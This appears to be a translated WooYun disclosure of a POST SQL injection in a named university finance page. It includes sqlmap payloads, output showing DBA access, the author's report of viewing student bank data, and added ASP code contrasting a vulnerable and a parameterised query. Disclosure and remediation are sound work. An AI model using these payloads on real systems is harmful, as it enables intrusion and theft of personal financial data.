
Vulnerability Summary

Defect ID: wooyun-2015-091170

Title: POST-based SQL injection in the Hunan University of Science and Technology finance site

Vendor: Hunan University of Science and Technology

Author: 路人甲

Submitted: 2015-01-13 14:49

Fix deadline: 2015-01-18 14:50

Disclosed: 2015-01-18 14:50

Vulnerability type: improper system/service operations configuration

Severity: Medium

Self-assessed Rank: 10

Status: handed over to a third-party partner (CCERT Education Network Emergency Response Team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-01-13: details sent to the vendor, awaiting vendor handling
2015-01-18: vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

'sa' privileges, painful to look at. Student information and bank account information are all in there!! (-__-)

Detailed description:

Page: http://cwc.hnust.cn/pay/getpass.asp

Append a ' and submit; the page throws an error.

Capture the request:

The submitted data is visible.
Straight to sqlmap.

Proof of vulnerability:

Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1212020202' AND 7443=7443 AND 'yDal'='yDal
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-9863' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(87)+CHAR(97)+CHAR(119)+CHAR(82)+CHAR(87)+CHAR(69)+CHAR(104)+CHAR(122)+CHAR(73)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113),NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1212020202'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1212020202' WAITFOR DELAY '0:0:5'--
---
[03:48:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[03:48:13] [INFO] testing if current user is DBA
current user is DBA: True
[03:48:13] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[03:48:13] [INFO] fetched data logged to text files under 'C:\Users\ERIC\.sqlmap\output\cwc.hnust.cn'


Still dba:

[03:53:04] [INFO] testing if current user is DBA
current user is DBA: True


Then checked how many databases there are:

Any database picked at random already has 250 tables:

Database: xssf5
[246 tables]



Since the table names are all pinyin abbreviations and hard to make sense of, I just tried a few tables at random.
Student IDs, bank account numbers, names... a huge amount of data, nearly everything from 2005 to the present.

Not interested in dumping the database~ leaving!

Fix recommendation:

Filter the input.
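As an added illustration that is not part of the original report, the classic ASP pattern that typically produces this class of injection (the POST field concatenated into the SQL text, which is what a single quote breaks) next to a version that passes the value as an ADODB parameter and connects with a read-only login instead of sa. The handler name, table and column names, connection string and the low-privilege login are placeholders, not taken from getpass.asp.

```asp
<%
' Added example, not the original getpass.asp. Table/column names and the
' connection string are placeholders.

' VULNERABLE pattern: the POST field becomes part of the SQL text, so a quote
' in "username" ends the string literal and the rest is executed as SQL.
Function LookupNameUnsafe(conn, username)
    Dim sql, rs
    sql = "SELECT name FROM students WHERE username = '" & username & "'"
    Set rs = conn.Execute(sql)
    If Not rs.EOF Then LookupNameUnsafe = rs("name")
    rs.Close
End Function

' HARDENED pattern: the value travels as a typed parameter, never as SQL text.
Function LookupNameSafe(conn, username)
    Const adCmdText = 1, adVarChar = 200, adParamInput = 1
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT name FROM students WHERE username = ?"
    cmd.Parameters.Append cmd.CreateParameter("username", adVarChar, adParamInput, 20, username)
    Set rs = cmd.Execute
    If Not rs.EOF Then LookupNameSafe = rs("name")
    rs.Close
End Function

Dim conn, username
username = Request.Form("username")
' Reject anything that is not a plausible student number before touching the DB.
If Len(username) = 0 Or Len(username) > 20 Or Not IsNumeric(username) Then
    Response.Status = "400 Bad Request"
    Response.End
End If
Set conn = Server.CreateObject("ADODB.Connection")
' Connect as a login that can only read the tables this page needs. The report
' shows the application running as sa (DBA), which turns one injectable field
' into access to every database on the server, bank account data included.
conn.Open "Provider=SQLOLEDB;Data Source=DB_HOST;Initial Catalog=DB_NAME;User ID=cwc_web_ro;Password=PLACEHOLDER"
Response.Write Server.HTMLEncode(LookupNameSafe(conn, username))
conn.Close
%>
```

Parameterisation removes the injection; the least-privilege login is what limits the blast radius if another page is still vulnerable.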

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability Response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-01-18 14:50

Vendor reply:

Latest status:

None yet